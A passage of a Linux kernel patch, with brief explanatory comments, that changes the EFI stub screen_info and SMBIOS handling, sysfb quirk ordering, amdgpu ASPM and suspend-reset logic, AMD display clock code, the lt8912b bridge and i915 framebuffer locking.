+- * In order to support both methods from the same build of the EFI stub
+- * library, provide this dummy global definition of struct screen_info. If it
+- * is required to satisfy a link dependency, it means we need to override the
+- * __weak alloc and free methods with the ones below, and those will be pulled
+- * in as well.
+  */
+-struct screen_info screen_info;
+ 
+ static efi_guid_t screen_info_guid = LINUX_EFI_SCREEN_INFO_TABLE_GUID;
+ 
+-struct screen_info *alloc_screen_info(void)
++struct screen_info *__alloc_screen_info(void)
+ {
+ 	struct screen_info *si;
+ 	efi_status_t status;
+diff --git a/drivers/firmware/efi/libstub/smbios.c b/drivers/firmware/efi/libstub/smbios.c
+index 460418b7f5f5e..f9c159c28f461 100644
+--- a/drivers/firmware/efi/libstub/smbios.c
++++ b/drivers/firmware/efi/libstub/smbios.c
+@@ -22,21 +22,30 @@ struct efi_smbios_protocol {
+ 	u8 minor_version;
+ };
+ 
+-const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize)
++const struct efi_smbios_record *efi_get_smbios_record(u8 type)
+ {
+ 	struct efi_smbios_record *record;
+ 	efi_smbios_protocol_t *smbios;
+ 	efi_status_t status;
+ 	u16 handle = 0xfffe;
+-	const u8 *strtable;
+ 
+ 	status = efi_bs_call(locate_protocol, &EFI_SMBIOS_PROTOCOL_GUID, NULL,
+ 			     (void **)&smbios) ?:
+ 		 efi_call_proto(smbios, get_next, &handle, &type, &record, NULL);
+ 	if (status != EFI_SUCCESS)
+ 		return NULL;
++	return record;
++}
++
++const u8 *__efi_get_smbios_string(const struct efi_smbios_record *record,
++				  u8 type, int offset, int recsize)
++{
++	const u8 *strtable;
++
++	if (!record)
++		return NULL;
+ 
+-	strtable = (u8 *)record + recsize;
++	strtable = (u8 *)record + record->length;
+ 	for (int i = 1; i < ((u8 *)record)[offset]; i++) {
+ 		int len = strlen(strtable);
+ 
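
The key fix in this hunk is stepping to the string table with record->length, the formatted-area size the firmware itself reports, rather than the size of whatever C struct the caller used, which can disagree with the firmware's SMBIOS revision. A standalone sketch of SMBIOS string lookup under that rule; the header struct here is a pared-down stand-in, not the kernel's type:

	#include <stdint.h>
	#include <string.h>

	struct smbios_hdr {		/* minimal stand-in for a record header */
		uint8_t  type;
		uint8_t  length;	/* formatted-area size reported by firmware */
		uint16_t handle;
	};

	/* Return 1-based string `idx` from the unformatted area, or NULL. */
	static const char *smbios_string(const struct smbios_hdr *rec, uint8_t idx)
	{
		const char *s = (const char *)rec + rec->length;	/* not sizeof()! */

		if (idx == 0)
			return NULL;		/* index 0 means "no string" */
		while (--idx) {
			s += strlen(s) + 1;	/* skip one NUL-terminated string */
			if (*s == '\0')
				return NULL;	/* double NUL: table ended early */
		}
		return s;
	}

A struct such as efi_smbios_type4_record above can be shorter or longer than what a given firmware actually emits, which is why record->length is the only safe offset to the string table.
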
+diff --git a/drivers/firmware/efi/libstub/zboot-header.S b/drivers/firmware/efi/libstub/zboot-header.S
+index ec4525d40e0cf..445cb646eaaaf 100644
+--- a/drivers/firmware/efi/libstub/zboot-header.S
++++ b/drivers/firmware/efi/libstub/zboot-header.S
+@@ -63,7 +63,7 @@ __efistub_efi_zboot_header:
+ 	.long		.Lefi_header_end - .Ldoshdr
+ 	.long		0
+ 	.short		IMAGE_SUBSYSTEM_EFI_APPLICATION
+-	.short		0
++	.short		IMAGE_DLL_CHARACTERISTICS_NX_COMPAT
+ #ifdef CONFIG_64BIT
+ 	.quad		0, 0, 0, 0
+ #else
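
The DllCharacteristics change tells PE loaders that the zboot image tolerates strict no-execute (W^X) memory mappings. Per the PE/COFF specification the bit is 0x0100; schematically, with a hypothetical firmware-side helper:

	#define IMAGE_DLL_CHARACTERISTICS_NX_COMPAT	0x0100	/* PE/COFF: NX-compatible image */

	if (optional_header->dll_characteristics & IMAGE_DLL_CHARACTERISTICS_NX_COMPAT)
		map_sections_w_xor_x(image);	/* hypothetical loader helper */
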
+diff --git a/drivers/firmware/efi/libstub/zboot.c b/drivers/firmware/efi/libstub/zboot.c
+index 66be5fdc6b588..22c2cf38ccc20 100644
+--- a/drivers/firmware/efi/libstub/zboot.c
++++ b/drivers/firmware/efi/libstub/zboot.c
+@@ -57,6 +57,11 @@ void __weak efi_cache_sync_image(unsigned long image_base,
+ 	// executable code loaded into memory to be safe for execution.
+ }
+ 
++struct screen_info *alloc_screen_info(void)
++{
++	return __alloc_screen_info();
++}
++
+ asmlinkage efi_status_t __efiapi
+ efi_zboot_entry(efi_handle_t handle, efi_system_table_t *systab)
+ {
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index f06fdacc9bc83..e76d6803bdd08 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -341,7 +341,7 @@ static const struct fwnode_operations efifb_fwnode_ops = {
+ #ifdef CONFIG_EFI
+ static struct fwnode_handle efifb_fwnode;
+ 
+-__init void sysfb_apply_efi_quirks(struct platform_device *pd)
++__init void sysfb_apply_efi_quirks(void)
+ {
+ 	if (screen_info.orig_video_isVGA != VIDEO_TYPE_EFI ||
+ 	    !(screen_info.capabilities & VIDEO_CAPABILITY_SKIP_QUIRKS))
+@@ -355,7 +355,10 @@ __init void sysfb_apply_efi_quirks(struct platform_device *pd)
+ 		screen_info.lfb_height = temp;
+ 		screen_info.lfb_linelength = 4 * screen_info.lfb_width;
+ 	}
++}
+ 
++__init void sysfb_set_efifb_fwnode(struct platform_device *pd)
++{
+ 	if (screen_info.orig_video_isVGA == VIDEO_TYPE_EFI && IS_ENABLED(CONFIG_PCI)) {
+ 		fwnode_init(&efifb_fwnode, &efifb_fwnode_ops);
+ 		pd->dev.fwnode = &efifb_fwnode;
+diff --git a/drivers/firmware/sysfb.c b/drivers/firmware/sysfb.c
+index 3fd3563d962b8..3c197db42c9d9 100644
+--- a/drivers/firmware/sysfb.c
++++ b/drivers/firmware/sysfb.c
+@@ -81,6 +81,8 @@ static __init int sysfb_init(void)
+ 	if (disabled)
+ 		goto unlock_mutex;
+ 
++	sysfb_apply_efi_quirks();
++
+ 	/* try to create a simple-framebuffer device */
+ 	compatible = sysfb_parse_mode(si, &mode);
+ 	if (compatible) {
+@@ -107,7 +109,7 @@ static __init int sysfb_init(void)
+ 		goto unlock_mutex;
+ 	}
+ 
+-	sysfb_apply_efi_quirks(pd);
++	sysfb_set_efifb_fwnode(pd);
+ 
+ 	ret = platform_device_add_data(pd, si, sizeof(*si));
+ 	if (ret)
+diff --git a/drivers/firmware/sysfb_simplefb.c b/drivers/firmware/sysfb_simplefb.c
+index a353e27f83f54..ca907f7e76c65 100644
+--- a/drivers/firmware/sysfb_simplefb.c
++++ b/drivers/firmware/sysfb_simplefb.c
+@@ -110,7 +110,7 @@ __init struct platform_device *sysfb_create_simplefb(const struct screen_info *s
+ 	if (!pd)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	sysfb_apply_efi_quirks(pd);
++	sysfb_set_efifb_fwnode(pd);
+ 
+ 	ret = platform_device_add_resources(pd, &res, 1);
+ 	if (ret)
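
The reshuffle works because the EFI quirks mutate the global screen_info (for example swapping lfb_width/lfb_height on misreporting machines), so they must run before sysfb_parse_mode() consumes it, while the efifb fwnode is a per-device property that belongs next to device creation. The intended ordering, sketched with a hypothetical stand-in for the two device-creation paths:

	sysfb_apply_efi_quirks();			/* 1: repair the global screen_info */
	compatible = sysfb_parse_mode(si, &mode);	/* 2: parse the corrected data */
	pd = demo_create_device(si, &mode);		/* hypothetical: simplefb or plain path */
	sysfb_set_efifb_fwnode(pd);			/* 3: per-device fwnode hookup */
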
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index d148a1bd85e67..c26e350583bf6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1268,6 +1268,7 @@ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
++bool amdgpu_device_aspm_support_quirk(void);
+ 
+ void amdgpu_cs_report_moved_bytes(struct amdgpu_device *adev, u64 num_bytes,
+ 				  u64 num_vis_bytes);
+@@ -1387,10 +1388,12 @@ int amdgpu_acpi_smart_shift_update(struct drm_device *dev, enum amdgpu_ss ss_sta
+ int amdgpu_acpi_pcie_notify_device_ready(struct amdgpu_device *adev);
+ 
+ void amdgpu_acpi_get_backlight_caps(struct amdgpu_dm_backlight_caps *caps);
++bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev);
+ void amdgpu_acpi_detect(void);
+ #else
+ static inline int amdgpu_acpi_init(struct amdgpu_device *adev) { return 0; }
+ static inline void amdgpu_acpi_fini(struct amdgpu_device *adev) { }
++static inline bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev) { return false; }
+ static inline void amdgpu_acpi_detect(void) { }
+ static inline bool amdgpu_acpi_is_power_shift_control_supported(void) { return false; }
+ static inline int amdgpu_acpi_power_shift_control(struct amdgpu_device *adev,
+@@ -1401,11 +1404,9 @@ static inline int amdgpu_acpi_smart_shift_update(struct drm_device *dev,
+ 
+ #if defined(CONFIG_ACPI) && defined(CONFIG_SUSPEND)
+ bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev);
+-bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev);
+ bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev);
+ #else
+ static inline bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev) { return false; }
+-static inline bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev) { return false; }
+ static inline bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev) { return false; }
+ #endif
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index 57b5e11446c65..f873692071032 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -971,6 +971,29 @@ static bool amdgpu_atcs_pci_probe_handle(struct pci_dev *pdev)
+ 	return true;
+ }
+ 
++
++/**
++ * amdgpu_acpi_should_gpu_reset
++ *
++ * @adev: amdgpu_device pointer
++ *
++ * returns true if the GPU should be reset, false if not
++ */
++bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
++{
++	if (adev->flags & AMD_IS_APU)
++		return false;
++
++	if (amdgpu_sriov_vf(adev))
++		return false;
++
++#if IS_ENABLED(CONFIG_SUSPEND)
++	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
++#else
++	return true;
++#endif
++}
++
+ /*
+  * amdgpu_acpi_detect - detect ACPI ATIF/ATCS methods
+  *
+@@ -1042,24 +1065,6 @@ bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev)
+ 		(pm_suspend_target_state == PM_SUSPEND_MEM);
+ }
+ 
+-/**
+- * amdgpu_acpi_should_gpu_reset
+- *
+- * @adev: amdgpu_device_pointer
+- *
+- * returns true if should reset GPU, false if not
+- */
+-bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
+-{
+-	if (adev->flags & AMD_IS_APU)
+-		return false;
+-
+-	if (amdgpu_sriov_vf(adev))
+-		return false;
+-
+-	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
+-}
+-
+ /**
+  * amdgpu_acpi_is_s0ix_active
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index d8e79de839d65..d5e14a3aa05dd 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -79,6 +79,10 @@
+ 
+ #include <drm/drm_drv.h>
+ 
++#if IS_ENABLED(CONFIG_X86)
++#include <asm/intel-family.h>
++#endif
++
+ MODULE_FIRMWARE("amdgpu/vega10_gpu_info.bin");
+ MODULE_FIRMWARE("amdgpu/vega12_gpu_info.bin");
+ MODULE_FIRMWARE("amdgpu/raven_gpu_info.bin");
+@@ -1354,6 +1358,17 @@ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev)
+ 	return pcie_aspm_enabled(adev->pdev);
+ }
+ 
++bool amdgpu_device_aspm_support_quirk(void)
++{
++#if IS_ENABLED(CONFIG_X86)
++	struct cpuinfo_x86 *c = &cpu_data(0);
++
++	return !(c->x86 == 6 && c->x86_model == INTEL_FAM6_ALDERLAKE);
++#else
++	return true;
++#endif
++}
++
+ /* if we get transitioned to only one device, take VGA back */
+ /**
+  * amdgpu_device_vga_set_decode - enable/disable vga decode
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 7f598977d6942..d9e8579e23ab7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2457,7 +2457,10 @@ static int amdgpu_pmops_freeze(struct device *dev)
+ 	adev->in_s4 = false;
+ 	if (r)
+ 		return r;
+-	return amdgpu_asic_reset(adev);
++
++	if (amdgpu_acpi_should_gpu_reset(adev))
++		return amdgpu_asic_reset(adev);
++	return 0;
+ }
+ 
+ static int amdgpu_pmops_thaw(struct device *dev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 25a68d8888e0d..5d4649b8bfd33 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1315,7 +1315,7 @@ void amdgpu_bo_release_notify(struct ttm_buffer_object *bo)
+ 
+ 	if (!bo->resource || bo->resource->mem_type != TTM_PL_VRAM ||
+ 	    !(abo->flags & AMDGPU_GEM_CREATE_VRAM_WIPE_ON_RELEASE) ||
+-	    adev->in_suspend || adev->shutdown)
++	    adev->in_suspend || drm_dev_is_unplugged(adev_to_drm(adev)))
+ 		return;
+ 
+ 	if (WARN_ON_ONCE(!dma_resv_trylock(bo->base.resv)))
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+index 4b0d563c6522c..4ef1fa4603c8e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+@@ -382,11 +382,6 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		if (def != data)
+ 			WREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regBIF1_PCIE_MST_CTRL_3), data);
+ 		break;
+-	case IP_VERSION(7, 5, 1):
+-		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
+-		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
+-		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
+-		fallthrough;
+ 	default:
+ 		def = data = RREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regPCIE_CONFIG_CNTL));
+ 		data = REG_SET_FIELD(data, PCIE_CONFIG_CNTL,
+@@ -399,6 +394,15 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		break;
+ 	}
+ 
++	switch (adev->ip_versions[NBIO_HWIP][0]) {
++	case IP_VERSION(7, 3, 0):
++	case IP_VERSION(7, 5, 1):
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
++		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
++		break;
++	}
++
+ 	if (amdgpu_sriov_vf(adev))
+ 		adev->rmmio_remap.reg_offset = SOC15_REG_OFFSET(NBIO, 0,
+ 			regBIF_BX_PF0_HDP_MEM_COHERENCY_FLUSH_CNTL) << 2;
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index df3388e8dec00..877989278290a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -527,7 +527,7 @@ static void nv_pcie_gen3_enable(struct amdgpu_device *adev)
+ 
+ static void nv_program_aspm(struct amdgpu_device *adev)
+ {
+-	if (!amdgpu_device_should_use_aspm(adev))
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
+ 		return;
+ 
+ 	if (!(adev->flags & AMD_IS_APU) &&
+diff --git a/drivers/gpu/drm/amd/amdgpu/vi.c b/drivers/gpu/drm/amd/amdgpu/vi.c
+index 12ef782eb4785..ceab8783575ca 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vi.c
++++ b/drivers/gpu/drm/amd/amdgpu/vi.c
+@@ -81,10 +81,6 @@
+ #include "mxgpu_vi.h"
+ #include "amdgpu_dm.h"
+ 
+-#if IS_ENABLED(CONFIG_X86)
+-#include <asm/intel-family.h>
+-#endif
+-
+ #define ixPCIE_LC_L1_PM_SUBSTATE	0x100100C6
+ #define PCIE_LC_L1_PM_SUBSTATE__LC_L1_SUBSTATES_OVERRIDE_EN_MASK	0x00000001L
+ #define PCIE_LC_L1_PM_SUBSTATE__LC_PCI_PM_L1_2_OVERRIDE_MASK	0x00000002L
+@@ -1138,24 +1134,13 @@ static void vi_enable_aspm(struct amdgpu_device *adev)
+ 		WREG32_PCIE(ixPCIE_LC_CNTL, data);
+ }
+ 
+-static bool aspm_support_quirk_check(void)
+-{
+-#if IS_ENABLED(CONFIG_X86)
+-	struct cpuinfo_x86 *c = &cpu_data(0);
+-
+-	return !(c->x86 == 6 && c->x86_model == INTEL_FAM6_ALDERLAKE);
+-#else
+-	return true;
+-#endif
+-}
+-
+ static void vi_program_aspm(struct amdgpu_device *adev)
+ {
+ 	u32 data, data1, orig;
+ 	bool bL1SS = false;
+ 	bool bClkReqSupport = true;
+ 
+-	if (!amdgpu_device_should_use_aspm(adev) || !aspm_support_quirk_check())
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
+ 		return;
+ 
+ 	if (adev->flags & AMD_IS_APU ||
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
+index 24715ca2fa944..01383aac6b419 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
+@@ -529,6 +529,19 @@ static struct clk_bw_params vg_bw_params = {
+ 
+ };
+ 
++static uint32_t find_max_clk_value(const uint32_t clocks[], uint32_t num_clocks)
++{
++	uint32_t max = 0;
++	int i;
++
++	for (i = 0; i < num_clocks; ++i) {
++		if (clocks[i] > max)
++			max = clocks[i];
++	}
++
++	return max;
++}
++
+ static unsigned int find_dcfclk_for_voltage(const struct vg_dpm_clocks *clock_table,
+ 		unsigned int voltage)
+ {
+@@ -572,12 +585,16 @@ static void vg_clk_mgr_helper_populate_bw_params(
+ 
+ 	bw_params->clk_table.num_entries = j + 1;
+ 
+-	for (i = 0; i < bw_params->clk_table.num_entries; i++, j--) {
++	for (i = 0; i < bw_params->clk_table.num_entries - 1; i++, j--) {
+ 		bw_params->clk_table.entries[i].fclk_mhz = clock_table->DfPstateTable[j].fclk;
+ 		bw_params->clk_table.entries[i].memclk_mhz = clock_table->DfPstateTable[j].memclk;
+ 		bw_params->clk_table.entries[i].voltage = clock_table->DfPstateTable[j].voltage;
+ 		bw_params->clk_table.entries[i].dcfclk_mhz = find_dcfclk_for_voltage(clock_table, clock_table->DfPstateTable[j].voltage);
+ 	}
++	bw_params->clk_table.entries[i].fclk_mhz = clock_table->DfPstateTable[j].fclk;
++	bw_params->clk_table.entries[i].memclk_mhz = clock_table->DfPstateTable[j].memclk;
++	bw_params->clk_table.entries[i].voltage = clock_table->DfPstateTable[j].voltage;
++	bw_params->clk_table.entries[i].dcfclk_mhz = find_max_clk_value(clock_table->DcfClocks, VG_NUM_DCFCLK_DPM_LEVELS);
+ 
+ 	bw_params->vram_type = bios_info->memory_type;
+ 	bw_params->num_channels = bios_info->ma_channel_number;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 754fc86341494..54656fcaa6464 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1016,6 +1016,7 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 	struct dc_sink *prev_sink = NULL;
+ 	struct dpcd_caps prev_dpcd_caps;
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
++	enum dc_connection_type pre_connection_type = link->type;
+ 	const uint32_t post_oui_delay = 30; // 30ms
+ 
+ 	DC_LOGGER_INIT(link->ctx->logger);
+@@ -1118,6 +1119,8 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 			}
+ 
+ 			if (!detect_dp(link, &sink_caps, reason)) {
++				link->type = pre_connection_type;
++
+ 				if (prev_sink)
+ 					dc_sink_release(prev_sink);
+ 				return false;
+@@ -1349,6 +1352,8 @@ bool dc_link_detect(struct dc_link *link, enum dc_detect_reason reason)
+ 	bool is_delegated_to_mst_top_mgr = false;
+ 	enum dc_connection_type pre_link_type = link->type;
+ 
++	DC_LOGGER_INIT(link->ctx->logger);
++
+ 	is_local_sink_detect_success = detect_link_and_local_sink(link, reason);
+ 
+ 	if (is_local_sink_detect_success && link->local_sink)
+@@ -1359,6 +1364,10 @@ bool dc_link_detect(struct dc_link *link, enum dc_detect_reason reason)
+ 			link->dpcd_caps.is_mst_capable)
+ 		is_delegated_to_mst_top_mgr = discover_dp_mst_topology(link, reason);
+ 
++	DC_LOG_DC("%s: link_index=%d is_local_sink_detect_success=%d pre_link_type=%d link_type=%d\n", __func__,
++		 link->link_index, is_local_sink_detect_success, pre_link_type, link->type);
++
++
+ 	if (is_local_sink_detect_success &&
+ 			pre_link_type == dc_connection_mst_branch &&
+ 			link->type != dc_connection_mst_branch)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index e4472c6be6c32..3fb4bcc343531 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -271,8 +271,7 @@ static void dccg32_set_dpstreamclk(
+ 	dccg32_set_dtbclk_p_src(dccg, src, otg_inst);
+ 
+ 	/* enabled to select one of the DTBCLKs for pipe */
+-	switch (otg_inst)
+-	{
++	switch (dp_hpo_inst) {
+ 	case 0:
+ 		REG_UPDATE_2(DPSTREAMCLK_CNTL,
+ 			     DPSTREAMCLK0_EN,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index b8767be1e4c55..30d15a94f720d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -1178,13 +1178,13 @@ unsigned int dcn32_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsign
+ 	if (is_dp_128b_132b_signal(pipe_ctx)) {
+ 		*k1_div = PIXEL_RATE_DIV_BY_1;
+ 		*k2_div = PIXEL_RATE_DIV_BY_1;
+-	} else if (dc_is_hdmi_tmds_signal(pipe_ctx->stream->signal) || dc_is_dvi_signal(pipe_ctx->stream->signal)) {
++	} else if (dc_is_hdmi_tmds_signal(stream->signal) || dc_is_dvi_signal(stream->signal)) {
+ 		*k1_div = PIXEL_RATE_DIV_BY_1;
+ 		if (stream->timing.pixel_encoding == PIXEL_ENCODING_YCBCR420)
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+ 		else
+ 			*k2_div = PIXEL_RATE_DIV_BY_4;
+-	} else if (dc_is_dp_signal(pipe_ctx->stream->signal) || dc_is_virtual_signal(pipe_ctx->stream->signal)) {
++	} else if (dc_is_dp_signal(stream->signal)) {
+ 		if (two_pix_per_container) {
+ 			*k1_div = PIXEL_RATE_DIV_BY_1;
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 252356a8160fa..6187aba1362b8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2186,6 +2186,7 @@ static bool dcn32_resource_construct(
+ 	dc->caps.edp_dsc_support = true;
+ 	dc->caps.extended_aux_timeout_support = true;
+ 	dc->caps.dmcub_support = true;
++	dc->caps.seamless_odm = true;
+ 
+ 	/* Color pipeline capabilities */
+ 	dc->caps.color.dpp.dcn_arch = 1;
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index a98efef0ba0e0..1b74a913f1b8f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -659,8 +659,8 @@ static int lt8912_parse_dt(struct lt8912 *lt)
+ 
+ 	lt->hdmi_port = of_drm_find_bridge(port_node);
+ 	if (!lt->hdmi_port) {
+-		dev_err(lt->dev, "%s: Failed to get hdmi port\n", __func__);
+-		ret = -ENODEV;
++		ret = -EPROBE_DEFER;
++		dev_err_probe(lt->dev, ret, "%s: Failed to get hdmi port\n", __func__);
+ 		goto err_free_host_node;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_crtc.c b/drivers/gpu/drm/i915/display/intel_crtc.c
+index 037fc140b585c..098acef59c10f 100644
+--- a/drivers/gpu/drm/i915/display/intel_crtc.c
++++ b/drivers/gpu/drm/i915/display/intel_crtc.c
+@@ -682,6 +682,14 @@ void intel_pipe_update_end(struct intel_crtc_state *new_crtc_state)
+ 	 */
+ 	intel_vrr_send_push(new_crtc_state);
+ 
++	/*
++	 * Seamless M/N update may need to update frame timings.
++	 *
++	 * FIXME Should be synchronized with the start of vblank somehow...
++	 */
++	if (new_crtc_state->seamless_m_n && intel_crtc_needs_fastset(new_crtc_state))
++		intel_crtc_update_active_timings(new_crtc_state);
++
+ 	local_irq_enable();
+ 
+ 	if (intel_vgpu_active(dev_priv))
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index dedbdb175f8b4..8b6994853f6f8 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5195,6 +5195,7 @@ intel_crtc_prepare_cleared_state(struct intel_atomic_state *state,
+ 	 * only fields that are know to not cause problems are preserved. */
+ 
+ 	saved_state->uapi = crtc_state->uapi;
++	saved_state->inherited = crtc_state->inherited;
+ 	saved_state->scaler_state = crtc_state->scaler_state;
+ 	saved_state->shared_dpll = crtc_state->shared_dpll;
+ 	saved_state->dpll_hw_state = crtc_state->dpll_hw_state;
+diff --git a/drivers/gpu/drm/i915/display/intel_fbdev.c b/drivers/gpu/drm/i915/display/intel_fbdev.c
+index 17e8bf2ac0e51..3a708bd73a000 100644
+--- a/drivers/gpu/drm/i915/display/intel_fbdev.c
++++ b/drivers/gpu/drm/i915/display/intel_fbdev.c
+@@ -210,6 +210,7 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 	bool prealloc = false;
+ 	void __iomem *vaddr;
+ 	struct drm_i915_gem_object *obj;
++	struct i915_gem_ww_ctx ww;
+ 	int ret;
+ 
+ 	mutex_lock(&ifbdev->hpd_lock);
+@@ -290,13 +291,24 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 		info->fix.smem_len = vma->size;
+ 	}
+ 
+-	vaddr = i915_vma_pin_iomap(vma);
+-	if (IS_ERR(vaddr)) {
+-		drm_err(&dev_priv->drm,
+-			"Failed to remap framebuffer into virtual memory (%pe)\n", vaddr);
+-		ret = PTR_ERR(vaddr);
+-		goto out_unpin;
++	for_i915_gem_ww(&ww, ret, false) {
++		ret = i915_gem_object_lock(vma->obj, &ww);
++
++		if (ret)
++			continue;
++
++		vaddr = i915_vma_pin_iomap(vma);
++		if (IS_ERR(vaddr)) {
++			drm_err(&dev_priv->drm,
++				"Failed to remap framebuffer into virtual memory (%pe)\n", vaddr);
++			ret = PTR_ERR(vaddr);
++			continue;
++		}
+ 	}
++
++	if (ret)
++		goto out_unpin;
++
+ 	info->screen_base = vaddr;
+ 	info->screen_size = vma->size;
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt.c b/drivers/gpu/drm/i915/gt/intel_gt.c
+index 9c18b5f2e7892..7868da20d5ea3 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt.c
